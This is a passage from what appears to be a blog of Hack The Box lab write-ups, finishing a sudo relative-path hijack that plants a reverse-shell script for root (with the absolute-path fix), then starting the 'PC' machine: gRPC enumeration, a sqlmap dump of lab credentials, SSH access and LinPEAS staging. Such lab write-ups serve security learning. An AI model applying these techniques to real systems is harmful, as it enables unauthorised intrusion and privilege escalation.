style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">system-checkup.py</code> contained an interesting code block:</p> <div class="gatsby-highlight" data-language="python"><pre class="language-python"><code class="language-python"><span class="token keyword">elif</span> action <span class="token operator">==</span> <span class="token string">'full-checkup'</span><span class="token punctuation">:</span> <span class="token keyword">try</span><span class="token punctuation">:</span> arg_list <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'./full-checkup.sh'</span><span class="token punctuation">]</span> <span class="token keyword">print</span><span class="token punctuation">(</span>run_command<span class="token punctuation">(</span>arg_list<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'[+] Done!'</span><span class="token punctuation">)</span> <span class="token keyword">except</span><span class="token punctuation">:</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'Something went wrong'</span><span class="token punctuation">)</span> exit<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span></code></pre></div> <p>The line <code class="language-text">arg_list = ['./full-checkup.sh']</code> references the <code class="language-text">full-checkup.sh</code> script by using its relative path. This means that the script will look for the file <code class="language-text">full-checkup.sh</code> within the current directory that the command <code class="language-text">sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup</code> is executed.</p> <p>To exploit this, I could write a custom shell script within a directory that <code class="language-text">svc</code> can write to (e.g. <code class="language-text">/home/svc</code>) which contains a reverse shell payload, then execute the command and catch a root shell.</p> <p>A way of mitigating a vulnerability like this from being exploited would be to reference <code class="language-text">full-checkup.sh</code> using its absolute path of <code class="language-text">/opt/scripts/full-checkup.sh</code>, ensuring that it's only executed from within the <code class="language-text">/opt/scripts</code> directory, thus preventing arbitrary code from being executed.</p> <p>Example of the code referencing <code class="language-text">full-checkup.sh</code> using the absolute path:</p> <div class="gatsby-highlight" data-language="python"><pre class="language-python"><code class="language-python"><span class="token keyword">elif</span> action <span class="token operator">==</span> <span class="token string">'full-checkup'</span><span class="token punctuation">:</span> <span class="token keyword">try</span><span class="token punctuation">:</span> arg_list <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'/opt/scripts/full-checkup.sh'</span><span class="token punctuation">]</span> <span class="token keyword">print</span><span class="token punctuation">(</span>run_command<span class="token punctuation">(</span>arg_list<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'[+] Done!'</span><span class="token punctuation">)</span> <span class="token keyword">except</span><span class="token punctuation">:</span> <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'Something went wrong'</span><span class="token punctuation">)</span> exit<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span></code></pre></div> <p>So within <code class="language-text">/home/svc</code>, I wrote a custom <code class="language-text">full-checkup.sh</code> script with a reverse shell command:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/17da9b35ea649425d40e2087c62edac8/2fe53/custom-full-checkup.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 21.51898734177215%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAz0lEQVR42o3Oz07CQBDH8T6EeCCtof922y4tUrGt4MmH0IsXYgQ1rRHXSIJGefOvWwsm3Dx8Mr/JzCRj3cyfWeoti9UXy2ZNrT+pX3dMfnrZsKjfuXt8Y/6gf3ca3c1ajf4wuxtW62+ub++xAlXheBP6QY4bFwzEGW50zkmYM5ATHFPT4grbP6VnJxw7CUd23HFienu2pO8OsYQqkaogHFbIbEqUzYhGlybP/rS9SC92poeyTnsr0grLkzmeMMIxbjgyeYxvPvWT8v9UJ1AlP8L7h50lpzTbAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="custom full-checkup" title="" src="/static/17da9b35ea649425d40e2087c62edac8/50637/custom-full-checkup.png" srcset="/static/17da9b35ea649425d40e2087c62edac8/dda05/custom-full-checkup.png 158w, /static/17da9b35ea649425d40e2087c62edac8/679a3/custom-full-checkup.png 315w, /static/17da9b35ea649425d40e2087c62edac8/50637/custom-full-checkup.png 630w, /static/17da9b35ea649425d40e2087c62edac8/2fe53/custom-full-checkup.png 674w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I started a Netcat listener, executed the script, and then caught a root shell:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c2e77b4d529ac30450f97cd01d9c44db/bf608/home-svc-full-checkup.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 11.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAZ0lEQVR42kXKWQqAIBSF4RbTQDQZDd40sgGEQnpo/3s5qUU9fJz7ww1IGSh9QW4nGqEhV4NOapDaIebDd2u76mcwvnxb0+rvop38uk6ZQJCyEWHGLUKY/6IP95JysOg1PApC/HLt/m7joEC355/b1AAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="/home/svc full-checkup" title="" src="/static/c2e77b4d529ac30450f97cd01d9c44db/50637/home-svc-full-checkup.png" srcset="/static/c2e77b4d529ac30450f97cd01d9c44db/dda05/home-svc-full-checkup.png 158w, /static/c2e77b4d529ac30450f97cd01d9c44db/679a3/home-svc-full-checkup.png 315w, /static/c2e77b4d529ac30450f97cd01d9c44db/50637/home-svc-full-checkup.png 630w, /static/c2e77b4d529ac30450f97cd01d9c44db/bf608/home-svc-full-checkup.png 680w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 530px; " > <a class="gatsby-resp-image-link" href="/static/7372227f9f2566fb0a01b8ceaae9dd82/eb8fc/root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.202531645569614%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABeElEQVR42o2R626CQBCFfRTlDkq57gILgoCgBU2lpr7/m5wOa02aGNP+ONnJsPudmcPC8Ato7AwtnqBnN9jsiDDdo2o+ULUX1P0Vdfd5rw9X2F6BlcmgmDFWuo+VFmCph1BNDtVKsQjTHkV3Q7IdwMqBHk4oqjNi6ge8hfNWwCYFrIUb7WBuBCw3g+Eksm+5BTb+DrqTQbVnID1quwl5NaIoT8hIVXOB2I5It4OcTFQnqkfESQc3qCTcixpEvKezBcveYWxyKFaCRb47ozt+0cWSnEpyzLH2StjkbFO9IYDlCiy1CIrB7qs9ZCTU41iRFJpOTsjzI+r9JN0j3sELa3Ls4cctqYFLJhF9mw1Ui0OjKR7SrYzOVGanPoABa1DSDxDlKFdZe1u5lrUW0OmC4czKZP0bdlf6DJxzEiQuDkiLgSbdI6DJTALNaz1DXgB/oIuIADmFnogeDmU2rzjnqdvJH7AXQJYd5MozTNHin+AZXeT/AD5DvwFRbR9LML61YAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root" title="" src="/static/7372227f9f2566fb0a01b8ceaae9dd82/eb8fc/root.png" srcset="/static/7372227f9f2566fb0a01b8ceaae9dd82/dda05/root.png 158w, /static/7372227f9f2566fb0a01b8ceaae9dd82/679a3/root.png 315w, /static/7372227f9f2566fb0a01b8ceaae9dd82/eb8fc/root.png 530w" sizes="(max-width: 530px) 100vw, 530px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-pc/https://mgarrity.com/hack-the-box-pc/Tue, 20 Jun 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/119bffdb244e7e6a1c82b1a2a807796f/3b67f/PC.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAElEQVR42mMQkdX+jxPLaf8Xltb+LyAGoUXl8KiFYgZcEiDNAhJa/0WU1f/Lm6r/F1PR/C8oCbGEZANBhgkCDVM11fsfmxT8Pysq539ErO9/FWNtsKH4XIrdhTJATQpa/2OKXP4nhRf/j/Ns/z+9fdX/gs7Y/wJSqv9FZXVIMBDsOu3/CoZa/zOKI/4npuf/TyzI/r9j//H/Exa2/ZdQUwaGpw5OV+JwIdAFCur/E3KC/s9q3PR/SuG2/6tm7v1f0pfwn18S6EI5HXLCUPu/ItCV8QW+/zOyE4C0/39FAy0ywxBmKFCzkKz6f1k9dTAtQG4sIxsK8p6wlA6YJiYdAgBQpgnwUNg7DwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="PC" title="" src="/static/119bffdb244e7e6a1c82b1a2a807796f/50637/PC.png" srcset="/static/119bffdb244e7e6a1c82b1a2a807796f/dda05/PC.png 158w, /static/119bffdb244e7e6a1c82b1a2a807796f/679a3/PC.png 315w, /static/119bffdb244e7e6a1c82b1a2a807796f/50637/PC.png 630w, /static/119bffdb244e7e6a1c82b1a2a807796f/fddb0/PC.png 945w, /static/119bffdb244e7e6a1c82b1a2a807796f/3b67f/PC.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>PC is a Linux machine with an open port running gRPC (Google Remote Procedure Call). Interaction with the server using <code class="language-text">grpcui</code> allows for the creation of a new user on the system. Interception of a POST request to the <code class="language-text">/invoke/SimpleApp.getInfo</code> endpoint can be used to run SQLMap, resulting in a database dump of username and passwords which can be leveraged to SSH into the system. Further scanning using LinPEAS reveals the presence of several active ports. Viewing a page on port 8000 uncovers that the server is running pyLoad, a download manager software. The current version of pyLoad running on the machine is vulnerable to arbitrary code injection (CVE-2023-0297) which can be used to get a root shell.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5504ff8648f8b7bd4a5ae69b9c31a0bc/030ec/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 108.86075949367088%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAYAAADAQbwGAAAACXBIWXMAAAsTAAALEwEAmpwYAAADr0lEQVR42m1V6XriOBDkVTbJDIQjnDYGy7ZsSeYwmCNAmB/7/o9RWy2O2Z3sj/7al0pV1a12oxk4tNQFzahGN7KI3R6qPMBuvhCoBTrjDM2P2MfP3tznH90ZXjtTvD0jfEZjpreY6Q2UqTEhwCReIkxW/no4NXgfJOiMMnTH2ufeJEeLoC/voQd9xBNQFTVGM4d5vkVi90gZ8mwSk90o9SD9oECrfwdpT328PXI3usUdtBFlawRcPCdLyf0wR5RViHg/IMPRrMSQVvRDcwNn7tKGnsRE+2vZWECFaaMzTJG5A9zqgpz+pZSeFmSbb2CWR8QE1otPv/ivVoDXO0th+98I8NIO0AjpWUTPJGKyTSh9RJb9UYLhJEVvOKfknIw0ZSvv6S0rtIeJv2+TVHuYoc3rxlQtoe0OmT2Q3Y7saihdYZ6ukDAneYW83COhCl0ekfAb8TpzvOa6Lm2QDQRMNmmovEZBSZnZe8mGi9zqDLe+YlH98tksdihczef8ztbQbgdTfSGmNWLDUzKjMU83/Ji7CXD5yY9P9O6CgiH5xn7rfTayMe/jTFRtfSEfVX9EYxqvkOY7SqyRFHvEvBY5qf28WUDJiuyV2XlQyTF9FtBpXH4HjLMt7OJE7/ae3Y3hGWZ1hWXWZot8eboFv7Pri/dSKh/r9bPqT0Cla3p1pdwT3PKLBTih5L2jfyXDLkQqvV3T14pWrE7IxOfN1Z+ulz8BRbIUxC7OjAtUTqaUm5gDi3XyG4iPwlQiIausqHxxpNX+18OMcqUoIjspDj5ivfOgEtrRT3skCN8b8br2LRXFFq+tyXfJmj2oucBKdcszcjLMHX0k64KsHS2wqy9/r4U1/TNrtg179aU5po/Bb0BpG20O/mORLa0i0i39LFigQp4TTO7L9fUGzsJY9qFitT3D938xDOfLW1OTYaJFNqWydYS1bOIVGDlFR/r56VtHS78yomT9XXKkKu9hJl4RWEA9oIAwq/smmW8r8fPoj6n0asA58NoK/+zDje9D6TnJ4mXJyVPt/mYbnX07yTtH2cvNLyy3PJKMUtqGw/lbH0p1LZtWFhgujulppNasco15IkNi40OYyiGI0spLjfhuFFq8tOQc38dZmwN2MC4wmBR8afDBEdUfc1RxFHUHGT6GGh8jDtFByucFuhxTIvGNAD/aEX52Zmj2+L95/Gt6MxZlxv/I1GEUGITzBWZqhSByjAVCTmvp03HoMOYzPzvJvkfgLjeVzYSEzEr5Tchs/Af0tvN97fXTQQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/5504ff8648f8b7bd4a5ae69b9c31a0bc/50637/nmap-scan.png" srcset="/static/5504ff8648f8b7bd4a5ae69b9c31a0bc/dda05/nmap-scan.png 158w, /static/5504ff8648f8b7bd4a5ae69b9c31a0bc/679a3/nmap-scan.png 315w, /static/5504ff8648f8b7bd4a5ae69b9c31a0bc/50637/nmap-scan.png 630w, /static/5504ff8648f8b7bd4a5ae69b9c31a0bc/030ec/nmap-scan.png 764w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>22 (SSH)</li> <li>50051 (unknown)</li> </ul> <p>I tried connecting to port 50051 with netcat which then showed these non-printable characters: ▒?��?�� ?</p> <p>Eventually the connection timed out with an error message:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 587px; " > <a class="gatsby-resp-image-link" href="/static/ce6bd46ec2816329c7ff80821973d833/0ef32/nc-http-2-error.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.759493670886075%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAgElEQVR42l3NOw6CQACEYe7iIxoEsiD7UnGFdY0QNUJj4f2v8SsUFhZfJpkpJlpLz8o+SaoX6WEgMQHfDnT9m+P5QX3tiYuKeSxZbBTLRE/5b9xHkXJ3hLmgqhZ7uiFsoNwHjOsQuiaTjvQrNw1C1b+usJ5cN2SlY7sL09EslnwA9pZCV5Em62oAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat HTTP/2 error" title="" src="/static/ce6bd46ec2816329c7ff80821973d833/0ef32/nc-http-2-error.png" srcset="/static/ce6bd46ec2816329c7ff80821973d833/dda05/nc-http-2-error.png 158w, /static/ce6bd46ec2816329c7ff80821973d833/679a3/nc-http-2-error.png 315w, /static/ce6bd46ec2816329c7ff80821973d833/0ef32/nc-http-2-error.png 587w" sizes="(max-width: 587px) 100vw, 587px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A web search for "http2 port 50051" brought up some results related to gRPC. Then, I found that the default port for gRPC is 50051. So, I looked for a tool that could be used to interact with gRPC which led to <code class="language-text">grpcui</code>, an interactive web UI for the gRPC protocol:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0b39b2b92ed17875e6213d654f6af7c3/d8724/grpcui.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 16.455696202531648%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAArUlEQVR42lWO2Q6CUAwF+RS3AIIbFy8gClxk0cRd4v9/yliILz5MTjtp2lquqrCjJ3Z4wY9qkuKKqV5k5YMwaVlscmbzmKkbMba3jB0tqZn0KYwcca4emMwjrFQWVKeOfX7h2HYczJ1j01E2b/EfMulN/Sben9FpzwkVNyg5vt21hEKQ1KhdgxfkWAdzQ4tchyXeKsNf9+T/yJe+DC+CgqUyQz24n/eCbFjmrFK+vPZiy/1HwnwAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="grpcui" title="" src="/static/0b39b2b92ed17875e6213d654f6af7c3/50637/grpcui.png" srcset="/static/0b39b2b92ed17875e6213d654f6af7c3/dda05/grpcui.png 158w, /static/0b39b2b92ed17875e6213d654f6af7c3/679a3/grpcui.png 315w, /static/0b39b2b92ed17875e6213d654f6af7c3/50637/grpcui.png 630w, /static/0b39b2b92ed17875e6213d654f6af7c3/d8724/grpcui.png 769w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/be680cc93d848d410f11736f3a18e7aa/d5403/grpc-webi-ui.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 104.43037974683544%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAACx0lEQVR42p1UyU7bUBT1N3TDomJSG6AIKEUUCXXedcOmqjqgMhQSSCCEDEwppdPXddXuWFQVCJKUxE7ixHYcO45zeu8rbgMKVeBJR9fv+fm8c+6711LH1DP4pufR82oWnYS++SX0zvgxsLiK7rkAeheC6A+GMRCKYDAcw8j6BkZiWxgljCW2BcY3dnB3M4mJrV1IPc+n8ZA3LoTgmw3g6c4eJiMJTNIHnTOL6Jr1E+kyfEtEurKOoUgcw1EiJYzGNv8Qx7cFxjeSkK5NvcD1l/PofkNq5pbR8fotuvykzr+C3mAEA9FNDG+/x83VKHoCK7gRXIMvtI4+mvcTBsNx3CIMrSUwTJD6ZwK4vRzBWCiKO4SxcAITcbIQ26GYxCSR3X/3UUTGveQe4QMe0Brj0e5nwic8pvhk9wskVdMhF4tQVBX5kiqeM1mZooqSYQiUjQq0ignNJFSrFD2YIuqnc46SU6shl8uiUChAJdKTkxz2938gk8miVnPgug1cZkiOU0OBVJXLZei6AUUp4OgoDVkpolq1cNkhNRoNVCoVGLoO27ZhWRY0TRPgQ0yy6jgOqa2JyHs12luv11sT8gu2WiqVYFIOTMpLPp9HkVRzGvTTg6qUOybVdU3sZ3IWcx6SQ4SpXxmk02kcHx/j4OBAfNw8eGNz9J49nLVcd2EpqrDHJx8eHorIynjNs8/zAilPpVLCsrfOcF33H6FtVXD086v4gC0x2CJHzqe3dv5d87xZpWQ6Jr7J36HIMikrnTntKkNyyXIpr4qLyOVkcWI743zuzpQNSzeoI/iGOToXlEQ7pILQsqrI0C0XRTnUhe1WJdEMb09LQtuyqeVOxK3adq0tQq7DVvmWvJcq/RiMivH3dIH/EHJDtFTIZFlSpygKZLppRr3NHF7Qeq5oO1HEp8XMnfLHvn2FsiFrXq+yWh68xkV9FaW/AWWv1irvLdDZAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="grpc web ui" title="" src="/static/be680cc93d848d410f11736f3a18e7aa/50637/grpc-webi-ui.png" srcset="/static/be680cc93d848d410f11736f3a18e7aa/dda05/grpc-webi-ui.png 158w, /static/be680cc93d848d410f11736f3a18e7aa/679a3/grpc-webi-ui.png 315w, /static/be680cc93d848d410f11736f3a18e7aa/50637/grpc-webi-ui.png 630w, /static/be680cc93d848d410f11736f3a18e7aa/d5403/grpc-webi-ui.png 739w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There were three methods available on this service: <code class="language-text">LoginUser</code>, <code class="language-text">RegisterUser</code>, and <code class="language-text">getInfo</code>. So I registered a new user and logged in which provided me with an <code class="language-text">id</code> and <code class="language-text">token</code>. I sent a request to <code class="language-text">getInfo</code> using the given <code class="language-text">id</code> and <code class="language-text">token</code> which responded with the message <code class="language-text">"Will update soon."</code></p> <p>I intercepted the request with Burp Suite:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/faab5ef5fa5b35e191db1074a9a671bf/f1720/burp-getinfo.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 63.291139240506325%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABnUlEQVR42oVTXW/DIAzM//9xe97T1K5rsrYkIQHCNzebNFOnZaslCwT2+c6YRqsZMUaklL69lAI2FyJm42C0wuXSIQR/j8k1Zo0r8DHh5fWEaZJo2o8z2q5F13V0MGGaZyzWwjlHK4GRW63xcTjj3F5xEwLDOMIYQwVCde8DHHnOGc37u4AQA6SU0JTIbDffmHLC5aowDKoWZRAuuN2j8lytOR4l2nYihp+0tpRMsu6AnLhKjMTIw1piURJ5xl/WHI4justIMiRGksJyGZQZWNozKIM76zErh8lNkE4i5rgP2J0E+quA7CWmQSIREFH6EbT2ilguHsorzG6GtBSb02/A81GgO/UQ3Q1OGQK0yMTw0WIM1F9bGYbkETIVSNSOsgM4Slsrx7C+0p7xuGjtIG6mPtAGWFB+AxodqG98+XejuafcRzU7aEMjdWe5Czhoibf+gJu5ol9I+iLqWveGZm4ZYN1SGSqSzEP9nzV6WeCpIr8ay6hO1f2dRT0nyeNoaA4tnlnjHCWl+G/Q9iNyLs8BWcLeaz3a4/9+BvgFqzD5/wXwmYoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="burp request getInfo" title="" src="/static/faab5ef5fa5b35e191db1074a9a671bf/50637/burp-getinfo.png" srcset="/static/faab5ef5fa5b35e191db1074a9a671bf/dda05/burp-getinfo.png 158w, /static/faab5ef5fa5b35e191db1074a9a671bf/679a3/burp-getinfo.png 315w, /static/faab5ef5fa5b35e191db1074a9a671bf/50637/burp-getinfo.png 630w, /static/faab5ef5fa5b35e191db1074a9a671bf/fddb0/burp-getinfo.png 945w, /static/faab5ef5fa5b35e191db1074a9a671bf/f1720/burp-getinfo.png 1024w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Assuming that the server was using some type of SQL database, I ran <code class="language-text">sqlmap</code> on the above request to check for SQLi. The output showed that the server was using SQLite and resulted in a database dump of usernames and passwords:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/PC] └─$ sqlmap -r req.txt --batch --dump &lt;...snip...> Database: &lt;current> Table: accounts [3 entries] +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | | password | test | +------------------------+----------+ &lt;...snip...></code></pre></div> <p>I was able to log in over SSH as the user <code class="language-text">sau</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 483px; " > <a class="gatsby-resp-image-link" href="/static/98ad79a7791cb4a61137619963e6504d/f5672/user-flag.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABJklEQVR42lWR/XKCMBDEfZWqoKhVJJgAQkGCfFS02Dq1tX3/19jeBceZ/rFzl+P2lwUGlnjF2L/AUt+YBDfY6x1k3KA5/mBfX6DrK9q3XxQV7SwijKeKFPRyQlimKozuGrjpJ5bbE8L0jLy+IUxaRMkBWfGOVHdYbzSe1ylmyxjDicRoQkautsTQ3pjezAnG4EFRfiDJjkjzE7YvBNJnqi2BD8hLSkjJVt6OoBmE3Bu4Jwu6qDCVn7l+Dnse9kDRfUERJM46yLDCwmWDpiVtegYtycQABvYwjZXIKXUCh5KzrNk9oequiE1KAkYVPLWHH5RQ2waCejbyWajSwHjOlS95vPJUGpgBBu0FHi1xGnse9N/G2uDJ8o2hVz/j/jEnkPlBzn/9AfgXxJWyA0h1AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="user flag" title="" src="/static/98ad79a7791cb4a61137619963e6504d/f5672/user-flag.png" srcset="/static/98ad79a7791cb4a61137619963e6504d/dda05/user-flag.png 158w, /static/98ad79a7791cb4a61137619963e6504d/679a3/user-flag.png 315w, /static/98ad79a7791cb4a61137619963e6504d/f5672/user-flag.png 483w" sizes="(max-width: 483px) 100vw, 483px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I started up a local python server so I could download LinPEAS onto the target:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 513px; " > <a class="gatsby-resp-image-link" href="/static/3992bcb9a0c6c317067397337cc773cd/bb9ec/python-http-server.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.050632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA9klEQVR42oWP606DQBCFeRTtIpSL5ba7bCkQ7iDSNpaq9f0f5Dilpol/9MeXOZmc+ZLRnvgLmDhBl2fo0QTDT5HVR1T9vNCMH6jHd1hBhpUlwez4TzQvm+HKjg4q2GEJT5TwZY0wruEEOWwSWX4G3VX/yhahSAcStHCjChtRg+96BHFD1DCfExKSNMxvQieG7twOdUf9mnchEwcw9Ul8gfEJjixRDWcM+wu618uSi+4E00vxYHB6W+Bx/YMpaBdiZXKwdbSgqWpGXB6hij2ibYe0PGBHuWjfKE/weIEkHxGpBjLpEaoWnHqC8pVrb0Mdw91Ct2N8A2TBopyLUTD7AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="python3 -m http.server" title="" src="/static/3992bcb9a0c6c317067397337cc773cd/bb9ec/python-http-server.png" srcset="/static/3992bcb9a0c6c317067397337cc773cd/dda05/python-http-server.png 158w, /static/3992bcb9a0c6c317067397337cc773cd/679a3/python-http-server.png 315w, /static/3992bcb9a0c6c317067397337cc773cd/bb9ec/python-http-server.png 513w" sizes="(max-width: 513px) 100vw, 513px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Downloaded LinPEAS with <code class="language-text">wget</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a4b4a1ad08879e4230dfc8e66a8327f2/d5403/download-linpeas.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 26.58227848101266%; position: relative; bottom: 0; left: 0; background-image: 